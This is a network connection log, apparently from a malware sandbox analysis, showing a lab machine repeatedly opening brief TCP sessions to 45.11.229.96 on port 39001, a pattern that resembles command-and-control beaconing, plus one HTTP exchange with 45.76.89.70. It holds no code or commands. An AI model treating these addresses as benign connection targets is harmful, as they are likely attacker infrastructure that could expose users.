Sep 19, 2024 02:27:52.405829906 CEST	39001	49907	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:52.405908108 CEST	49907	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:52.414849997 CEST	39001	49907	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:52.856636047 CEST	39001	49907	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:52.856720924 CEST	49907	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:52.856807947 CEST	49907	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:52.862366915 CEST	39001	49907	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:52.966365099 CEST	49908	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:52.986054897 CEST	39001	49908	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:52.989175081 CEST	49908	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:53.218472004 CEST	49908	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:53.223572016 CEST	39001	49908	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:53.223665953 CEST	49908	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:53.228477955 CEST	39001	49908	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:53.649230957 CEST	39001	49908	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:53.649348021 CEST	49908	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:53.649497986 CEST	49908	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:53.657008886 CEST	39001	49908	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:53.768739939 CEST	49909	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:53.777182102 CEST	39001	49909	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:53.777354002 CEST	49909	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:53.822568893 CEST	49909	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:53.827424049 CEST	39001	49909	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:53.827485085 CEST	49909	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:53.832374096 CEST	39001	49909	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:54.608983040 CEST	39001	49909	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:54.609064102 CEST	49909	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:54.609174967 CEST	49909	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:54.613930941 CEST	39001	49909	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:54.718662977 CEST	49910	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:54.723496914 CEST	39001	49910	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:54.723575115 CEST	49910	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:54.952214956 CEST	49910	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:54.957077026 CEST	39001	49910	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:54.958276987 CEST	49910	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:54.963073969 CEST	39001	49910	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:55.358719110 CEST	39001	49910	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:55.360719919 CEST	49910	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:55.360826015 CEST	49910	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:55.365590096 CEST	39001	49910	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:55.466356039 CEST	49911	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:55.471256971 CEST	39001	49911	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:55.472395897 CEST	49911	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:55.691519022 CEST	49911	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:55.696583986 CEST	39001	49911	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:55.696644068 CEST	49911	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:55.701515913 CEST	39001	49911	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:56.107736111 CEST	39001	49911	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:56.107939005 CEST	49911	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:56.108002901 CEST	49911	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:56.112931013 CEST	39001	49911	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:56.216428995 CEST	49912	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:56.221366882 CEST	39001	49912	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:56.221457958 CEST	49912	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:56.246563911 CEST	49912	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:56.251393080 CEST	39001	49912	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:56.251490116 CEST	49912	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:56.256315947 CEST	39001	49912	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:56.849270105 CEST	39001	49912	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:56.849369049 CEST	49912	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:56.849536896 CEST	49912	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:56.857431889 CEST	39001	49912	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:56.966512918 CEST	49913	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:56.971510887 CEST	39001	49913	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:56.971596003 CEST	49913	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:56.992489100 CEST	49913	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:56.997313023 CEST	39001	49913	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:56.997375965 CEST	49913	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:57.002650976 CEST	39001	49913	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:57.626866102 CEST	39001	49913	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:57.626930952 CEST	49913	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:57.628637075 CEST	49913	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:57.633433104 CEST	39001	49913	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:57.747929096 CEST	49914	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:57.752897024 CEST	39001	49914	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:57.752966881 CEST	49914	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:57.842122078 CEST	49914	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:57.847096920 CEST	39001	49914	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:57.847167015 CEST	49914	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:57.852204084 CEST	39001	49914	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:58.403944969 CEST	39001	49914	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:58.404031992 CEST	49914	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:58.404131889 CEST	49914	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:58.409813881 CEST	39001	49914	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:58.530451059 CEST	49915	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:58.535352945 CEST	39001	49915	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:58.535533905 CEST	49915	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:58.710218906 CEST	49915	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:58.715028048 CEST	39001	49915	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:58.715126991 CEST	49915	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:58.719930887 CEST	39001	49915	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:59.194505930 CEST	39001	49915	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:59.194603920 CEST	49915	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:59.194725037 CEST	49915	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:59.199513912 CEST	39001	49915	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:59.316042900 CEST	49916	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:59.323899984 CEST	39001	49916	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:59.323991060 CEST	49916	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:59.439620972 CEST	49916	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:59.445247889 CEST	39001	49916	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:59.445327997 CEST	49916	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:59.452419043 CEST	39001	49916	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:59.952680111 CEST	39001	49916	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:59.952805042 CEST	49916	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:59.955686092 CEST	49916	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:59.960546017 CEST	39001	49916	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:00.196393013 CEST	49917	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:00.201324940 CEST	39001	49917	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:00.201525927 CEST	49917	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:00.227786064 CEST	49917	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:00.234519005 CEST	39001	49917	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:00.234594107 CEST	49917	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:00.244469881 CEST	39001	49917	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:00.859136105 CEST	39001	49917	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:00.859220982 CEST	49917	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:00.859327078 CEST	49917	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:00.864243984 CEST	39001	49917	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:00.966320992 CEST	49918	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:00.971265078 CEST	39001	49918	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:00.971364975 CEST	49918	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:00.992731094 CEST	49918	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:00.997781038 CEST	39001	49918	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:00.997859001 CEST	49918	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:01.003247023 CEST	39001	49918	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:01.353951931 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:28:01.465648890 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:28:01.614736080 CEST	39001	49918	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:01.614839077 CEST	49918	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:01.614931107 CEST	49918	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:01.619849920 CEST	39001	49918	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:01.732146978 CEST	49919	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:01.737730980 CEST	39001	49919	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:01.737818956 CEST	49919	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:01.776686907 CEST	49919	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:01.781531096 CEST	39001	49919	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:01.781579018 CEST	49919	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:01.787463903 CEST	39001	49919	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:02.391769886 CEST	39001	49919	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:02.392285109 CEST	49919	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:02.402690887 CEST	49919	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:02.407587051 CEST	39001	49919	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:02.528837919 CEST	49920	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:02.533798933 CEST	39001	49920	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:02.533929110 CEST	49920	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:02.570067883 CEST	49920	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:02.575679064 CEST	39001	49920	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:02.575773954 CEST	49920	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:02.580651999 CEST	39001	49920	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:03.163675070 CEST	39001	49920	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:03.166336060 CEST	49920	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:03.166477919 CEST	49920	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:03.171346903 CEST	39001	49920	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:03.278776884 CEST	49921	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:03.284791946 CEST	39001	49921	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:03.286329985 CEST	49921	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:03.327146053 CEST	49921	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:03.331959963 CEST	39001	49921	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:03.332525015 CEST	49921	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:03.337608099 CEST	39001	49921	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:03.955998898 CEST	39001	49921	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:03.956147909 CEST	49921	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:03.956212044 CEST	49921	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:03.962291956 CEST	39001	49921	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:04.060148954 CEST	49922	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:04.066577911 CEST	39001	49922	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:04.066952944 CEST	49922	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:04.304821968 CEST	49922	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:04.311362982 CEST	39001	49922	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:04.311461926 CEST	49922	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:04.317781925 CEST	39001	49922	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:04.710527897 CEST	39001	49922	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:04.710647106 CEST	49922	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:04.710822105 CEST	49922	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:04.715658903 CEST	39001	49922	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:04.825809956 CEST	49923	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:04.832892895 CEST	39001	49923	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:04.833000898 CEST	49923	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:04.861954927 CEST	49923	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:04.867162943 CEST	39001	49923	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:04.867249966 CEST	49923	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:04.872128963 CEST	39001	49923	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:05.772721052 CEST	39001	49923	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:05.772864103 CEST	49923	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:05.772969961 CEST	49923	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:05.777842045 CEST	39001	49923	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:05.888499022 CEST	49924	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:05.897990942 CEST	39001	49924	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:05.898093939 CEST	49924	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:05.930782080 CEST	49924	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:05.935591936 CEST	39001	49924	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:05.935672045 CEST	49924	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:05.940603971 CEST	39001	49924	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:06.520488024 CEST	39001	49924	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:06.520592928 CEST	49924	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:06.520739079 CEST	49924	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:06.525628090 CEST	39001	49924	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:06.639187098 CEST	49925	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:06.646543980 CEST	39001	49925	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:06.646635056 CEST	49925	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:07.004488945 CEST	49925	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:07.009407043 CEST	39001	49925	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:07.009476900 CEST	49925	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:07.014256954 CEST	39001	49925	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:07.328860044 CEST	39001	49925	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:07.328952074 CEST	49925	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:07.329087973 CEST	49925	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:07.333827972 CEST	39001	49925	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:07.435421944 CEST	49926	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:07.440602064 CEST	39001	49926	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:07.440671921 CEST	49926	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:07.477323055 CEST	49926	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:07.482393026 CEST	39001	49926	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:07.482454062 CEST	49926	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:07.487318039 CEST	39001	49926	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:08.074244976 CEST	39001	49926	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:08.078337908 CEST	49926	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:08.078521967 CEST	49926	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:08.083348036 CEST	39001	49926	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:08.185169935 CEST	49927	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:08.190382957 CEST	39001	49927	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:08.194304943 CEST	49927	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:08.624456882 CEST	49927	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:08.629678965 CEST	39001	49927	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:08.629757881 CEST	49927	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:08.634737968 CEST	39001	49927	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:09.017054081 CEST	39001	49927	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:09.017247915 CEST	49927	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:09.017323017 CEST	49927	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:09.022413969 CEST	39001	49927	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:09.122698069 CEST	49928	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:09.127805948 CEST	39001	49928	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:09.127899885 CEST	49928	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:09.152442932 CEST	49928	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:09.157283068 CEST	39001	49928	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:09.157361031 CEST	49928	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:09.162125111 CEST	39001	49928	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:09.756778002 CEST	39001	49928	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:09.756844997 CEST	49928	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:09.756949902 CEST	49928	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:09.764916897 CEST	39001	49928	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:09.872570992 CEST	49929	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:09.878029108 CEST	39001	49929	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:09.878120899 CEST	49929	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:10.051338911 CEST	49929	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:10.056655884 CEST	39001	49929	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:10.056746006 CEST	49929	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:10.063848019 CEST	39001	49929	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:10.545958042 CEST	39001	49929	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:10.546061039 CEST	49929	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:10.546168089 CEST	49929	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:10.551002026 CEST	39001	49929	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:10.654113054 CEST	49930	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:10.659297943 CEST	39001	49930	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:10.659427881 CEST	49930	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:10.685674906 CEST	49930	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:10.692022085 CEST	39001	49930	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:10.692106009 CEST	49930	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:10.697074890 CEST	39001	49930	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:11.289563894 CEST	39001	49930	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:11.289716005 CEST	49930	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:11.289791107 CEST	49930	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:11.294629097 CEST	39001	49930	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:11.403826952 CEST	49931	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:11.408809900 CEST	39001	49931	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:11.408910990 CEST	49931	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:11.431618929 CEST	49931	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:11.436577082 CEST	39001	49931	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:11.436651945 CEST	49931	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:11.441447973 CEST	39001	49931	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:12.031416893 CEST	39001	49931	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:12.031550884 CEST	49931	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:12.031723022 CEST	49931	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:12.036565065 CEST	39001	49931	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:12.138387918 CEST	49932	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:12.143625975 CEST	39001	49932	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:12.143834114 CEST	49932	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:12.171808004 CEST	49932	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:12.176999092 CEST	39001	49932	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:12.177088022 CEST	49932	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:12.181921959 CEST	39001	49932	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:12.802720070 CEST	39001	49932	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:12.802953959 CEST	49932	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:12.806261063 CEST	49932	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:12.811122894 CEST	39001	49932	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:12.921180010 CEST	49933	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:12.926549911 CEST	39001	49933	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:12.926641941 CEST	49933	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:13.455598116 CEST	49933	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:13.460599899 CEST	39001	49933	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:13.460675955 CEST	49933	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:13.465575933 CEST	39001	49933	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:13.880667925 CEST	39001	49933	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:13.880906105 CEST	49933	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:13.880906105 CEST	49933	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:13.885878086 CEST	39001	49933	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:13.997754097 CEST	49934	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:14.002825975 CEST	39001	49934	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:14.002917051 CEST	49934	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:14.649992943 CEST	49934	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:14.655551910 CEST	39001	49934	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:14.655637980 CEST	49934	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:14.660737991 CEST	39001	49934	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:15.108486891 CEST	39001	49934	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:15.108563900 CEST	49934	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:15.108661890 CEST	49934	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:15.113687038 CEST	39001	49934	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:15.216439009 CEST	49935	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:15.221740961 CEST	39001	49935	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:15.221852064 CEST	49935	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:15.245502949 CEST	49935	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:15.251569033 CEST	39001	49935	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:15.251667976 CEST	49935	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:15.256867886 CEST	39001	49935	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:15.923618078 CEST	39001	49935	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:15.923707008 CEST	49935	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:15.923824072 CEST	49935	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:15.929455996 CEST	39001	49935	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:16.028934956 CEST	49936	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:16.036446095 CEST	39001	49936	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:16.036550999 CEST	49936	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:16.327205896 CEST	49936	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:16.332222939 CEST	39001	49936	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:16.332304001 CEST	49936	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:16.337160110 CEST	39001	49936	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:16.655453920 CEST	39001	49936	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:16.655534029 CEST	49936	39001	192.168.2.5	45.11.229.96
